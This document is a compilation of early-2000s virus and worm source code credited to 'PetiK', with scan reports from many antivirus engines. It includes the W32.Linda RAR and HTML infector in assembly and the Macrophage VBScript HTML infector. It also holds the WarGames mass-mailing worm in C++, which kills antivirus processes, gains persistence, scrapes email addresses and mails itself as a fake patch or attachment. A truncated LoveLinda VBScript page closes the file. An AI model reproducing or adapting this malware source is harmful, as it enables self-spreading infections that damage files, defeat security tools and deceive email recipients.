PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

comment § Name : W32.Linda Data : February 13th 2002 Author : PetiK Language : Win32asm Size : 8192 (compressed with ASPack). Action : Infects rar files and ht* files in the current directory. § .386 locals jumps .model flat,STDCALL api macro x extrn x:proc call x endm struct dd 0 dd ?,? dd ?,? dd ?,? dd 0 dd 0 dd 0,0 db 260 dup(0) db 14 dup(0) db 2 dup (0) ends

WIN32_FIND_DATA dwFileAttributes ftCreationTime ftLastAccessTime ftLastWriteTime nFileSizeHigh nFileSizeLow dwReserved0 cFileName cAlternateFileName WIN32_FIND_DATA .DATA CRLF ffile sysTime orig_virus thFile Err time0 time1 time2 Size HeaderSize rarmask htmmask hFile fHnd mHnd sizer octets

equ <13,10> WIN32_FIND_DATA <?> db 16 dup(0) db dd dd dd dd dd 50 dup (0) ? 0 0,0 0,0 0,0

equ 8192 = EndRARHeader-RARHeader db "*.rar",0 db "*.ht*",0 dd ? dd ? dd ? dd 0 dd 0 dw db dw dw dd dd db dd db db db db dw dd db label 0 74h 8000h HeaderSize Size Size 0 0 63h,78h 31h,24h 14h 30h EndRARHeader-RARName 0 "LINDA32.EXE" byte

RARHeader: RARHeaderCRC RARType RARFlags RARHSize RARCompressed RAROriginal RAROs RARCrc32 RARFileTime RARFileDate RARNeedVer RARMethod RARFNameSize RARAttrib RARName EndRARHeader .CODE start_linda:

mov push api lea cmp jne cmp jne push call db @tit: call db db @mes: push api end_pay: push mov push push api push push push push api test je mov push push push push push push push api cmp je mov push mov lea push push push push api push api rar_srch: push push api dec jz inc mov inf_rar: call call cmp je call

eax,offset sysTime eax GetSystemTime eax,sysTime word ptr [eax+2],8 end_pay word ptr [eax+6],10 end_pay 40h @tit "W32RAR.Linda",0

; August ; 10th. Linda's Birthday

@mes "This virus infects only RAR files.",0dh,0ah "Happy Birthday - (c)2002",0 0 MessageBoxA 50 esi,offset orig_virus esi 0 GetModuleFileNameA 4 1000h 8192 0 VirtualAlloc eax,eax end_srch_rar dword ptr [mHnd],eax 0 80h 3 0 1 80000000h offset orig_virus CreateFileA eax,-1 end_srch_rar dword ptr [fHnd],eax 0 dword ptr [sizer],0 eax,sizer eax 8192 dword ptr [mHnd] dword ptr [fHnd] ReadFile dword ptr [mHnd] CloseHandle offset ffile offset rarmask FindFirstFileA eax end_srch_rar eax dword ptr [hFile],eax times infect byte ptr [Err],1 rar_nxt_srch timer

rar_nxt_srch: push offset ffile mov eax,dword ptr [hFile] push eax

api FindNextFileA test eax,eax jnz inf_rar mov eax,dword ptr [hFile] push eax api FindClose end_srch_rar: htm_srch: push push api dec jz inc mov inf_htm: call offset ffile offset htmmask FindFirstFileA eax end_srch_htm eax dword ptr [hFile],eax infecthtm

htm_nxt_srch: push offset ffile mov eax,dword ptr [hFile] push eax api FindNextFileA test eax,eax jnz inf_htm mov eax,dword ptr [hFile] push eax api FindClose end_srch_htm: end_linda: push api times: push push push push push push api cmp je mov push push push push api push api mov ret tserr: ret timer: push push push push push push api cmp je mov push push push push api push api

0 ExitProcess push 0 80h 3 0 1 80000000h offset ffile.cFileName CreateFileA eax,-1 tserr dword ptr [thFile],eax offset time0 offset time1 offset time2 dword ptr [thFile] GetFileTime dword ptr [thFile] CloseHandle byte ptr [Err],0 mov byte ptr [Err],1

push 0 80h 3 0 1 40000000h offset ffile.cFileName CreateFileA eax,-1 trerr dword ptr [thFile],eax offset time0 offset time1 offset time2 dword ptr [thFile] SetFileTime dword ptr [thFile] CloseHandle

trerr:

ret

infecthtm: push offset ffile.cFileName api GetFileAttributesA cmp eax,1 or 20h je end_inf_htm push 0 push 80h push 3 push 0 push 1 push 40000000h push offset ffile.cFileName api CreateFileA cmp eax,-1 je end_inf_htm mov dword ptr [fHnd],eax push 2 push 0 push dword ptr [fHnd] api _llseek push 0 push offset octets push e_htm - s_htm call e_htm s_htm: db "",CRLF,CRLF db "<SCRIPT Language=VBScript>",CRLF db "On Error Resume Next",CRLF db "document.Write ""<font face='verdana' color=green size='2'>Hi guy ! How are you ?" db "<br>If you read these lines, is that you are infected by my Virus Linda." db "<br>Look at your RAR files. They could be infected too." db "<br>Good Bye and have a nice day.<br></font>""",0dh,0ah db "</SCRIPT>",0dh,0ah e_htm: push dword ptr [fHnd] api WriteFile push dword ptr [fHnd] api CloseHandle push 1 or 20h push offset ffile.cFileName api SetFileAttributesA end_inf_htm: ret

infect: push push push push push push lea push api dec jz inc mov push push push api mov mov call mov mov mov call mov

xor eax,eax eax 80h 3 eax eax 40000000h eax,ffile.cFileName eax CreateFileA eax end_infect eax dword ptr [fHnd],eax 2 0 dword ptr [fHnd] _llseek esi,dword ptr [mHnd] edi,Size CRC32 dword ptr [RARCrc32],eax esi,offset RARHeader+2 edi,HeaderSize-2 CRC32 word ptr [RARHeaderCRC],ax

; like SetFilePointer

xor push push push push push api mov mov mov push push push push push api push api end_infect: ret

eax,eax eax offset octets HeaderSize offset RARHeader dword ptr [fHnd] WriteFile dword ptr [RARHeaderCRC],0 dword ptr [RARCrc32],0 dword ptr [RARCrc32+2],0 0 offset octets Size dword ptr [mHnd] dword ptr [fHnd] WriteFile dword ptr [fHnd] CloseHandle

CRC32: cld push ebx mov ecx,-1 mov edx,ecx NextByteCRC: xor eax,eax xor ebx,ebx lodsb xor al,cl mov cl,ch mov ch,dl mov dl,dh mov dh,8 NextBitCRC: shr bx,1 rcr ax,1 jnc NoCRC xor ax,08320h xor bx,0edb8h NoCRC: dec dh jnz NextBitCRC xor ecx,eax xor edx,ebx dec di jnz NextByteCRC not edx not ecx pop ebx mov eax,edx rol eax,16 mov ax,cx ret ends end start_linda

;xor ecx,ecx & dec ecx

File w32linda32.exe received on 05.16.2009 19:48:06 (CET)

Antivirus          Version         Last Update
a-squared          4.0.0.101       2009.05.16
AhnLab-V3          5.0.0.2         2009.05.16
AntiVir            7.9.0.168       2009.05.15
Antiy-AVL          2.0.3.1         2009.05.15
Authentium         5.1.2.4         2009.05.16
Avast              4.8.1335.0      2009.05.15
AVG                8.5.0.336       2009.05.15
BitDefender        7.2             2009.05.16
CAT-QuickHeal      10.00           2009.05.15
ClamAV             0.94.1          2009.05.16
Comodo             1157            2009.05.08
DrWeb              5.0.0.12182     2009.05.16
eSafe              7.0.17.0        2009.05.14
eTrust-Vet         31.6.6508       2009.05.16
F-Prot             4.4.4.56        2009.05.16
F-Secure           8.0.14470.0     2009.05.15
Fortinet           3.117.0.0       2009.05.16
GData              19              2009.05.16
Ikarus             T3.1.1.49.0     2009.05.16
K7AntiVirus        7.10.737        2009.05.16
Kaspersky          7.0.0.125       2009.05.16
McAfee             5616            2009.05.15
McAfee+Artemis     5616            2009.05.15
McAfee-GW-Edition  6.7.6           2009.05.15
Microsoft          1.4602          2009.05.16
NOD32              4080            2009.05.15
Norman             6.01.05         2009.05.16
nProtect           2009.1.8.0      2009.05.16
Panda              10.0.0.14       2009.05.16
PCTools            4.4.2.0         2009.05.16
Prevx              3.0             2009.05.16
Rising             21.29.52.00     2009.05.16
Sophos             4.41.0          2009.05.16
Sunbelt            3.2.1858.2      2009.05.16
Symantec           1.4.4.12        2009.05.16
TheHacker          6.3.4.1.326     2009.05.15
TrendMicro         8.950.0.1092    2009.05.15
VBA32              3.12.10.5       2009.05.16
ViRobot            2009.5.15.1737  2009.05.15
VirusBuster        4.6.5.0         2009.05.16

Result (38 detection names, in the order given; the mapping to individual engines is not preserved): Worm.Win32.Petik!IK, Win32/Petik.worm.8192.C, Worm/Petik.AP1, Worm/Win32.Win32, W32/Malware!c1a4, Win32:Agent-XPK, Worm/Linda, Win32.Linda.A, Win32.Linda, Worm.Win32.Petik.Linda, Win32.Petik.4096, Win32.Petik, HTML/Linad, W32/Malware!c1a4, Worm.Win32.Petik, W32/Petik!worm.p2p, Win32.Linda.A, Worm.Win32.Petik, Worm.Win32.Petik, Worm.Win32.Petik, W32/Linda.worm, W32/Linda.worm, Worm.Petik.AP1, Worm:Win32/Linra.A, Win32/Petik.Linda, W32/Pet_Tick.8192.E, Univ.AP.F, Worm.Petik, High Risk Worm, Worm.Win32.Petik.a, W32/Petik-S, Worm.Win32.Petik, W95.Pet_Tick.gen, W32/Petik, PE_LINDA.A, Win32.Worm.Petik, Worm.Win32.Petik.8192, Worm.Petik.AG

Additional information
File size: 8192 bytes
MD5...: 2bdfd3609d98f54cc1c8fc7e3f5e925c
SHA1..: 1e1c42c4d1cefd930ca37e60ba8689f3d0da174c
PEiD..: ASPack v2.12

<macrophage> <html><head><title>Internet Explo$er</title></head><body> <script language=vbscript> On Error Resume Next set fso=createobject("scripting.filesystemobject") If err.number=429 then document.write "<font face='Lucida Console' size='2' color=black>You need ActiveX enabled to see this file<br><a href='javascript:location.reload()'>Click Here</a> to reload and click Yes</font>" Else Set ws=CreateObject("WScript.Shell") cache=ws.RegRead ("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache") cook=ws.RegRead ("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies") desk=ws.RegRead ("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop") favor=ws.RegRead ("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Favorites") pers=ws.RegRead ("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal") infect(fso.GetSpecialFolder(0)) infect(fso.GetSpecialFolder(1)) infect(fso.GetSpecialFolder(2)) infect(cache) infect(cook) infect(desk) infect(favor) infect(pers) If Day(Now())=10 Then document.write "<font face='verdana' size='2' color=black>Sorry but your browser can't read this page.<br>Try an another day.<br></font>" document.write "<font face='verdana' size='2' color=blue><br>GOOD BYE and HAVE A NICE DAY.</font>" End If End If Function infect(doss) Set FolderObj = FSO.GetFolder(doss) Set FO = FolderObj.Files For each cible in FO ext = lcase(FSO.GetExtensionName(cible.Name)) if ext="htm" or ext="html" or ext="htz" or ext="hta" or ext="asp" Then Set good = fso.OpenTextFile(cible.path, 1, False) if good.readline <> "<macrophage>" Then good.close() Set good = fso.OpenTextFile(cible.path, 1, False) htmorg = good.ReadAll() good.close() Set virus = document.body.createTextRange Set good = fso.CreateTextFile(cible.path, True, False) good.WriteLine "<macrophage>" good.Write(htmorg) 
good.WriteLine virus.htmltext good.Close() else good.close() end if end if next End Function </script></html>

File Macrophage.htm received on 05.16.2009 17:51:50 (CET)

Antivirus          Version         Last Update
a-squared          4.0.0.101       2009.05.16
AhnLab-V3          5.0.0.2         2009.05.16
AntiVir            7.9.0.168       2009.05.15
Antiy-AVL          2.0.3.1         2009.05.15
Authentium         5.1.2.4         2009.05.16
Avast              4.8.1335.0      2009.05.15
AVG                8.5.0.336       2009.05.15
BitDefender        7.2             2009.05.16
CAT-QuickHeal      10.00           2009.05.15
ClamAV             0.94.1          2009.05.16
Comodo             1157            2009.05.08
DrWeb              5.0.0.12182     2009.05.16
eSafe              7.0.17.0        2009.05.14
eTrust-Vet         31.6.6508       2009.05.16
F-Prot             4.4.4.56        2009.05.16
F-Secure           8.0.14470.0     2009.05.15
Fortinet           3.117.0.0       2009.05.16
GData              19              2009.05.16
Ikarus             T3.1.1.49.0     2009.05.16
K7AntiVirus        7.10.737        2009.05.16
Kaspersky          7.0.0.125       2009.05.16
McAfee             5616            2009.05.15
McAfee+Artemis     5616            2009.05.15
McAfee-GW-Edition  6.7.6           2009.05.15
Microsoft          1.4602          2009.05.16
NOD32              4080            2009.05.15
Norman             6.01.05         2009.05.16
nProtect           2009.1.8.0      2009.05.16
Panda              10.0.0.14       2009.05.16
PCTools            4.4.2.0         2009.05.16
Prevx              3.0             2009.05.16
Rising             21.29.52.00     2009.05.16
Sophos             4.41.0          2009.05.16
Sunbelt            3.2.1858.2      2009.05.16
Symantec           1.4.4.12        2009.05.16
TheHacker          6.3.4.1.326     2009.05.15
TrendMicro         8.950.0.1092    2009.05.15
VBA32              3.12.10.5       2009.05.16
ViRobot            2009.5.15.1737  2009.05.15
VirusBuster        4.6.5.0         2009.05.16

Result (32 detection names, in the order given; the mapping to individual engines is not preserved): Virus.VBS.Petik!IK, HTML/Petik, VBS/Petik.Good, Virus/VBS.VBS, VBS/Petik.K, VBS:Malware-gen, VBS/Rophage.A, VBS.Petik.A, VBS/Petik.K, VBS.Macrophage, VBS.Petik.a., VBS/Rophage, VBS/Petik.K, Virus.VBS.Petik, VBS/Petik.K, VBS.Petik.A, Virus.VBS.Petik, Virus.VBS.Petik, VBS/Rophage, VBS/Rophage, Script.Petik.Good, Virus:VBS/Petik, VBS/Petik.B, VBS/Petik.C, VBS.Petik.A, HTML/Mage, VBS.Acroph.A, VBS.Petik, VBS.Prepend, VBS_PETIK.B, Virus.VBS.Petik, VBS.Acroph.A

Additional information
File size: 2226 bytes
MD5...: fee8a8a543264ddb70fa00cfbd10625b
SHA1..: 800f9ec17e06d88ecbe5979289e4f67847770561

/* Name : I-Worm.WarGames Author : PetiK Date : February 12th 2002 - February 22th 2002 Language : C++/Win32asm */ #include <stdio.h> #include <windows.h> #include <mapi.h> #include <tlhelp32.h> #pragma argused #pragma inline char int char char LPSTR filename[100],sysdir[100],copyr[50]="w",winhtm[100],subj[50]; num,counter=0; *alph[]={"a","b","c","d","e","f","g","h","i","j","k","l","m", "n","o","p","q","r","s","t","u","v","w","x","y","z"}; dn[20]="Wargames Uninstall",ust[40]="rundll32 mouse,disable";

SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders"; BYTE desktop[50],favoris[50],personal[50],cache[50],page[150]; DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris), sizpersonal=sizeof(personal),sizdesktop=sizeof(cache),spage=sizeof(page); DWORD type=REG_SZ; FILE *vbsworm,*winstart; HANDLE lSnapshot,myproc; BOOL rProcessFound; LHANDLE session; MapiMessage mess; MapiMessage *mes; MapiRecipDesc from; char messId[512],mname[50],maddr[30]; HINSTANCE hMAPI; WIN32_FIND_DATA PROCESSENTRY32 HKEY SYSTEMTIME void void void void ULONG ULONG ULONG ULONG ULONG ULONG ffile; uProcess; hReg; wartime;

StopAV(char *); FindFile(char *,char *); GetMail(char *,char *); sendmail(char *); (PASCAL (PASCAL (PASCAL (PASCAL (PASCAL (PASCAL FAR FAR FAR FAR FAR FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG); *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG); *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE); *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR); *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *); *mFreeBuffer)(LPVOID);

int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow) { // Kill Some AntiVirus StopAV("AVP32.EXE"); // AVP StopAV("AVPCC.EXE"); // AVP StopAV("AVPM.EXE"); // AVP StopAV("WFINDV32.EXE"); // Dr. Solomon StopAV("F-AGNT95.EXE"); // F-Secure StopAV("NAVAPW32.EXE"); // Norton Antivirus StopAV("NAVW32.EXE"); // Norton Antivirus StopAV("NMAIN.EXE"); // Norton Antivirus StopAV("PAVSCHED.EXE"); // Panda AntiVirus StopAV("ZONEALARM.EXE"); // ZoneAlarm // Kill Some Worm StopAV("KERN32.EXE"); StopAV("SETUP.EXE"); StopAV("RUNDLLW32.EXE"); StopAV("GONER.SCR"); StopAV("LOAD.EXE"); StopAV("INETD.EXE"); StopAV("FILES32.VXD"); StopAV("SCAM32.EXE"); StopAV("GDI32.EXE"); // // // // // // // // // I-Worm.Badtrans I-Worm.Cholera I-Worm.Gift I-Worm.Goner I-Worm.Nimda I-Worm.Plage - BadTrans I-Worm.PrettyPark I-Worm.Sircam I-Worm.Sonic

StopAV("_SETUP.EXE"); StopAV("EXPLORE.EXE"); StopAV("ZIPPED_FILES.EXE");

// I-Worm.ZippedFiles // I-Worm.ZippedFiles // I-Worm.ZippedFiles

GetModuleFileName(hInst,filename,100); GetSystemDirectory((char *)sysdir,100); SetCurrentDirectory(sysdir); CopyFile(filename,"article.doc.exe",TRUE); RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\ \WarGames Worm",&hReg); RegSetValueEx(hReg,"DisplayName",0,REG_SZ,(BYTE *)dn,20); RegSetValueEx(hReg,"UninstallString",0,REG_SZ,(BYTE *)ust,40); RegCloseKey(hReg); randomize(); num=rand() % 10; randname: strcat(copyr,alph[GetTickCount()%25]); if(++counter==num) { strcat(copyr,".exe"); MessageBox(NULL,copyr,"New Copy Name:",MB_OK|MB_ICONINFORMATION); CopyFile(filename,copyr,FALSE); WriteProfileString("WINDOWS","RUN",copyr); WritePrivateProfileString("rename","NUL",filename,"WININIT.INI"); goto endrandname; } Sleep(GetTickCount()%100); goto randname; endrandname: hMAPI=LoadLibrary("MAPI32.DLL"); (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail"); RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg); RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop); RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris); RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal); RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache); RegCloseKey(hReg); GetWindowsDirectory((char *)winhtm,100); _asm { call @wininet db "WININET.DLL",0 @wininet: call LoadLibrary test eax,eax jz end_asm mov ebp,eax call @inetconnect db "InternetGetConnectedState",0 @inetconnect: push ebp call GetProcAddress test eax,eax jz end_wininet mov edi,eax verf: push 0 push Tmp call edi dec eax jnz verf end_wininet: push ebp call FreeLibrary end_asm: jmp end_all_asm Tmp dd 0

end_all_asm: } FindFile(desktop,"*.htm"); FindFile(desktop,"*.doc"); FindFile(favoris,"*.ht*");

FindFile(personal,"*.ht*"); FindFile(personal,"*.doc"); FindFile(personal,"*.xls"); FindFile(personal,"*.asp"); FindFile(cache,".ht*"); FindFile(cache,".php"); FindFile(cache,".asp"); FindFile(winhtm,".ht*"); FindFile(winhtm,".doc"); vbsworm=fopen("wargames.vbs","w"); fprintf(vbsworm,"On Error Resume Next\n"); fprintf(vbsworm,"msgbox %cScripting.FileSystemObject%c\n",34,34); fprintf(vbsworm,"Set sf=CreateObject(%cScripting.FileSystemObject%c)\n",34,34); fprintf(vbsworm,"Set sys=sf.GetSpecialFolder(1)\n"); fprintf(vbsworm,"Set OA=CreateObject(%cOutlook.Application%c)\n",34,34); fprintf(vbsworm,"Set MA=OA.GetNameSpace(%cMAPI%c)\n",34,34); fprintf(vbsworm,"For Each C In MA.AddressLists\n"); fprintf(vbsworm,"If C.AddressEntries.Count <> 0 Then\n"); fprintf(vbsworm,"For D=1 To C.AddressEntries.Count\n"); fprintf(vbsworm,"Set AD=C.AddressEntries(D)\n"); fprintf(vbsworm,"Set EM=OA.CreateItem(0)\n"); fprintf(vbsworm,"EM.To=AD.Address\n"); fprintf(vbsworm,"EM.Subject=%cHi %c&AD.Name&%c read this.%c\n",34,34,34,34); fprintf(vbsworm,"body=%cI found this on the web and it is important.%c\n",34,34); fprintf(vbsworm,"body = body & VbCrLf & %cOpen the attached file and read.%c\n",34,34); fprintf(vbsworm,"EM.Body=body\n"); fprintf(vbsworm,"EM.Attachments.Add(sys&%c\\article.doc.exe%c)\n",34,34); fprintf(vbsworm,"EM.DeleteAfterSubmit=True\n"); fprintf(vbsworm,"If EM.To <> %c%c Then\n",34,34); fprintf(vbsworm,"EM.Send\n"); fprintf(vbsworm,"End If\n"); fprintf(vbsworm,"Next\n"); fprintf(vbsworm,"End If\n"); fprintf(vbsworm,"Next\n"); fclose(vbsworm); ShellExecute(NULL,"open","wargames.vbs",NULL,NULL,SW_SHOWNORMAL); Sleep(5000); DeleteFile("wargames.vbs"); (FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon"); (FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff"); (FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext"); (FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail"); (FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer"); 
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session); if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) { do { if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY| MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) { strcpy(mname,mes->lpOriginator->lpszName); strcpy(maddr,mes->lpOriginator->lpszAddress); mes->ulReserved=0; mes->lpszSubject="Re: Fw:"; mes->lpszNoteText="I received your mail but I cannot reply immediatly.\n" "I send you a nice program. Look at this.\n\n" " See you soon."; mes->lpszMessageType=NULL; mes->lpszDateReceived=NULL; mes->lpszConversationID=NULL; mes->flFlags=MAPI_SENT; mes->lpOriginator->ulReserved=0; mes->lpOriginator->ulRecipClass=MAPI_ORIG; mes->lpOriginator->lpszName=mes->lpRecips->lpszName; mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress; mes->nRecipCount=1; mes->lpRecips->ulReserved=0; mes->lpRecips->ulRecipClass=MAPI_TO; mes->lpRecips->lpszName=mname; mes->lpRecips->lpszAddress=maddr; mes->nFileCount=1; mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc)); memset(mes->lpFiles, 0, sizeof(MapiFileDesc)); mes->lpFiles->ulReserved=0; mes->lpFiles->flFlags=NULL; mes->lpFiles->nPosition=-1; mes->lpFiles->lpszPathName=filename;

mes->lpFiles->lpszFileName="funny.exe"; mes->lpFiles->lpFileType=NULL; mSendMail(session, NULL, mes, NULL, NULL); } }while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS); free(mes->lpFiles); mFreeBuffer(mes); mLogoff(session,0,0,0); FreeLibrary(hMAPI); } } void FindFile(char *folder, char *ext) { register bool abc=TRUE; register HANDLE hFile; char mail[128]; SetCurrentDirectory(folder); hFile=FindFirstFile(ext,&ffile); if(hFile!=INVALID_HANDLE_VALUE) { while(abc) { SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE); GetMail(ffile.cFileName,mail); if(strlen(mail)>0) { sendmail(mail); } abc=FindNextFile(hFile,&ffile); } } } void GetMail(char *namefile, char *mail) { HANDLE hf,hf2; char *mapped; DWORD size,i,k; BOOL test=FALSE,valid=FALSE; mail[0]=0; hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIV E,0); if(hf==INVALID_HANDLE_VALUE) return; size=GetFileSize(hf,NULL); if(!size) return; if(size<8) return; size-=100; hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0); if(!hf2) { CloseHandle(hf); return; } mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0); if(!mapped) { CloseHandle(hf2); CloseHandle(hf); return; } i=0; while(i<size && !test) { if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) { test=TRUE; i+=strlen("mailto:"); k=0; while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) { if(mapped[i]!=' ') { mail[k]=mapped[i]; k++; if(mapped[i]=='@') valid=TRUE;

} i++; } mail[k]=0; } else i++; } if(!valid) mail[0]=0; UnmapViewOfFile(mapped); CloseHandle(hf2); CloseHandle(hf); return; } void sendmail(char *tos) { memset(&mess,0,sizeof(MapiMessage)); memset(&from,0,sizeof(MapiRecipDesc)); wsprintf(subj,"Mail to %s.",tos); from.lpszName=NULL; from.ulRecipClass=MAPI_ORIG; mess.lpszSubject=subj; mess.lpszNoteText="I send you this patch.\n" "It corrects a bug into Internet Explorer and Outlook.\n\n" " Have a nice day. Best Regards."; mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc)); if(!mess.lpRecips) return; memset(mess.lpRecips,0,sizeof(MapiRecipDesc)); mess.lpRecips->lpszName=tos; mess.lpRecips->lpszAddress=tos; mess.lpRecips->ulRecipClass=MAPI_TO; mess.nRecipCount=1; mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc)); if(!mess.lpFiles) return; memset(mess.lpFiles,0,sizeof(MapiFileDesc)); mess.lpFiles->lpszPathName=filename; mess.lpFiles->lpszFileName="patch.exe"; mess.nFileCount=1; mess.lpOriginator=&from; mSendMail(0,0,&mess,0,0); free(mess.lpRecips); free(mess.lpFiles); } void StopAV(char *antivirus) { register BOOL term; lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); uProcess.dwSize=sizeof(uProcess); rProcessFound=Process32First(lSnapshot,&uProcess); while(rProcessFound) { if(strstr(uProcess.szExeFile,antivirus)!=NULL) { myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID); if(myproc!=NULL) { term=TerminateProcess(myproc,0); } CloseHandle(myproc); } rProcessFound=Process32Next(lSnapshot,&uProcess); } CloseHandle(lSnapshot); }

File WarGames.exe received on 05.16.2009 19:57:59 (CET)

Antivirus          Version         Last Update  Result
a-squared          4.0.0.101       2009.05.16   Email-Worm.Win32.Wargam!IK
AhnLab-V3          5.0.0.2         2009.05.16   Win32/Warga.worm.77824
AntiVir            7.9.0.168       2009.05.15   Worm/WarGame.1
Antiy-AVL          2.0.3.1         2009.05.15   Worm/Win32.Win32
Authentium         5.1.2.4         2009.05.16   W32/Malware!6ca1
Avast              4.8.1335.0      2009.05.15   Win32:Wargam-B
AVG                8.5.0.336       2009.05.15   I-Worm/Wargames
BitDefender        7.2             2009.05.16   Win32.WarGames.A@mm
CAT-QuickHeal      10.00           2009.05.15   I-Worm.Wargam
ClamAV             0.94.1          2009.05.16   Worm.Wargam
Comodo             1157            2009.05.08   Worm.Win32.Warga.A
DrWeb              5.0.0.12182     2009.05.16   Win32.HLLM.Warga
eSafe              7.0.17.0        2009.05.14   Win32.Wargam
eTrust-Vet         31.6.6508       2009.05.16   Win32/Wargam
F-Prot             4.4.4.56        2009.05.16   W32/Malware!6ca1
F-Secure           8.0.14470.0     2009.05.15   Email-Worm.Win32.Wargam
Fortinet           3.117.0.0       2009.05.16   W32/Wargam.A@mm
GData              19              2009.05.16   Win32.WarGames.A@mm
Ikarus             T3.1.1.49.0     2009.05.16   Email-Worm.Win32.Wargam
K7AntiVirus        7.10.737        2009.05.16   Email-Worm.Win32.Wargam
Kaspersky          7.0.0.125       2009.05.16   Email-Worm.Win32.Wargam
McAfee             5616            2009.05.15   W32/Warga@MM
McAfee+Artemis     5616            2009.05.15   W32/Warga@MM
McAfee-GW-Edition  6.7.6           2009.05.15   Worm.WarGame.1
Microsoft          1.4602          2009.05.16   Worm:Win32/Wargam.A@mm
NOD32              4080            2009.05.15   Win32/Warga.A
Norman             6.01.05         2009.05.16   W32/Pet_Tick.77824.A
nProtect           2009.1.8.0      2009.05.16   Worm/W32.Worgam.77824
Panda              10.0.0.14       2009.05.16   W32/Wargam
PCTools            4.4.2.0         2009.05.16   I-Worm.Petwrg.A
Prevx              3.0             2009.05.16   High Risk Worm
Rising             21.29.52.00     2009.05.16   Worm.Wargames
Sophos             4.41.0          2009.05.16   W32/Warga-A
Sunbelt            3.2.1858.2      2009.05.16   W32.Wargam.Worm
Symantec           1.4.4.12        2009.05.16   W32.Wargam.Worm
TheHacker          6.3.4.1.326     2009.05.15   W32/Wargam
TrendMicro         8.950.0.1092    2009.05.15   WORM_WARGA.A
VBA32              3.12.10.5       2009.05.16   Win32.HLLW.Wargames
ViRobot            2009.5.15.1737  2009.05.15   I-Worm.Win32.Wargame
VirusBuster        4.6.5.0         2009.05.16   I-Worm.Petwrg.A

Additional information
File size: 77824 bytes
MD5...: f3f60781ccd4c9c429a1431f0162a295
SHA1..: d6ff0b428178a9898f1552a0d18e59b48686cb67

<html><head><title>Love Linda</title></head>
<body bgColor=blue onLoad="window.status='I LOVE YOU Linda'">
<font face='verdana' color=yellow size='3'>For Linda...<br>
<br>Because I Love You.
<br>I code this.<br>I can't say what I feel for you.
<br>You will know by this way.<br></font>
<SCRIPT Language=VBScript>
On Error Resume Next
msgbox "Please accept the ActiveX",vbinformation,"Info"
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
If err.number=429 then
' Error 429 = object creation refused (ActiveX blocked): reload the page and ask again
ws.Run javascript:location.reload()
Else
Set win=fso.GetSpecialFolder(0)
Set sys=fso.GetSpecialFolder(1)
' Write this page's own body to %WINDIR%\LoveLinda.htm; that file is the mail attachment
Set linda = fso.CreateTextFile(win&"\LoveLinda.htm", 2)
Set love = document.body.createTextRange
linda.WriteLine "<html><head><title>Love Linda</title>"
linda.WriteLine "<body bgColor=blue>"
linda.WriteLine love.htmltext
linda.WriteLine "</body></html>"
linda.Close
' Companion .htm copies next to data files in %WINDIR%, %SYSTEM% and My Documents
pers=ws.RegRead ("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal")
create(win)
create(sys)
create(pers)
' Cosmetic registry changes, then persistence: the generated mailer runs at every logon
cv="HKLM\Software\Microsoft\Windows\CurrentVersion"
ws.RegWrite cv&"\RegisteredOwner","Linda"
ws.RegWrite cv&"\RegisteredOrganization","Love Linda"
